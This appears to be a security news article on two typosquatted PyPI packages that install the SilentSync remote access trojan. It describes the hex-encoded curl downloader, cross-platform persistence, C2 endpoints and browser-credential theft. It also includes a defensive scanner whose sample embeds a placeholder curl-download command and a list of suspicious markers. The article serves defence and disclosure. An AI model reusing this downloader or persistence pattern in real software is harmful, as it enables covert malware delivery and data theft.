Cybersecurity researchers have recently identified two malicious packages within the Python Package Index (PyPI) repository, designed to deploy a remote access trojan (RAT) named SilentSync on Windows systems. This discovery underscores the escalating threat of supply chain attacks targeting software developers.
SilentSync is a sophisticated malware capable of executing remote commands, exfiltrating files, and capturing screenshots. Additionally, it extracts sensitive data from web browsers—including credentials, browsing history, autofill information, and cookies—from popular browsers such as Chrome, Brave, Edge, and Firefox.
The two malicious packages, uploaded by a user identified as CondeTGAPIS, have since been removed from PyPI. They are:
– sisaws: 201 downloads
– secmeasure: 627 downloads
The sisaws package was crafted to mimic the legitimate sisa package associated with Argentina’s national health information system, Sistema Integrado de Información Sanitaria Argentino (SISA). Within its initialization script (`__init__.py`), a function named `gen_token()` serves as a downloader for subsequent malware stages. When invoked, this function sends a hard-coded token and receives a secondary static token in return, emulating the behavior of the genuine SISA API.
Upon execution, `gen_token()` decodes a hexadecimal string to reveal a curl command that fetches an additional Python script from Pastebin. That script is saved as `helper.py` in a temporary directory and executed, launching the next stage of the attack.
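One way a defender can triage a package for this decode-and-run pattern, as an added example that is not from the article or the researchers: walk the package's `__init__.py` AST and flag long hex string literals that decode to text containing download or execution markers. The sample `__init__.py`, the placeholder URL and token, and the marker list are all constructed for this example.

```python
import ast
import re

# Substrings that are suspicious inside a decoded hex literal of a library's package
# initialiser. Assumption: this marker list was chosen for the example.
SUSPICIOUS_MARKERS = ("curl ", "wget ", "pastebin", "powershell", "/tmp/", "helper.py")
# Require at least 8 byte pairs so short hex-looking values (ids, colours) are ignored.
HEX_RE = re.compile(r"^(?:[0-9a-fA-F]{2}){8,}$")

# Constructed sample resembling the technique described above: a hex literal that
# decodes to a download command. The URL and token are placeholders, not real values.
SAMPLE_CMD = "curl -s https://pastebin.example/raw/PLACEHOLDER -o /tmp/helper.py"
SAMPLE_INIT_PY = (
    "import os, tempfile\n"
    "BUILD_ID = '00112233445566778899aabbccddeeff'  # benign hex-looking constant\n"
    "def gen_token(token):\n"
    "    if token != 'STATIC-TOKEN-PLACEHOLDER':\n"
    "        return None\n"
    f"    cmd = bytes.fromhex('{SAMPLE_CMD.encode().hex()}').decode()\n"
    "    return cmd  # the sample only returns the decoded command, never runs it\n"
)

def decode_hex_literal(text):
    """Decoded text if `text` is a long hex string that decodes to printable UTF-8, else None."""
    if not HEX_RE.match(text):
        return None
    try:
        decoded = bytes.fromhex(text).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return decoded if decoded.isprintable() else None

def scan_source(source):
    """Report every string constant in the module that hides a hex-encoded command."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Constant) and isinstance(node.value, str)):
            continue
        decoded = decode_hex_literal(node.value)
        if decoded is None:
            continue
        hits = [m for m in SUSPICIOUS_MARKERS if m in decoded.lower()]
        if hits:
            findings.append({"line": node.lineno, "decoded": decoded, "markers": hits})
    return findings

if __name__ == "__main__":
    for f in scan_source(SAMPLE_INIT_PY):
        print(f"line {f['line']}: decodes to {f['decoded']!r}, markers {f['markers']}")
```

The benign hex-looking constant is ignored because it does not decode to printable text, which keeps false positives from build ids and hashes low.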
Similarly, the secmeasure package masquerades as a library for string cleaning and security measures but contains embedded functionality to deploy the SilentSync RAT.
Although SilentSync primarily targets Windows systems, it also carries persistence logic for Linux and macOS: on Windows it modifies the Registry; on Linux it edits the crontab file so the payload runs at startup; and on macOS it registers a LaunchAgent.
The malware communicates with a command-and-control (C2) server at the hard-coded IP address 200.58.107[.]25, utilizing four distinct endpoints:
– `/checkin`: Verifies connectivity
– `/comando`: Requests commands for execution
– `/respuesta`: Sends status messages
– `/archivo`: Transmits command outputs or stolen data
SilentSync’s capabilities include harvesting browser data, executing shell commands, capturing screenshots, and stealing files. It can exfiltrate entire directories as ZIP archives. To evade detection, the malware deletes all artifacts from the host after data transmission.
This incident highlights the growing risk of supply chain attacks within public software repositories. By employing typosquatting and impersonating legitimate packages, threat actors can infiltrate systems and access personally identifiable information (PII).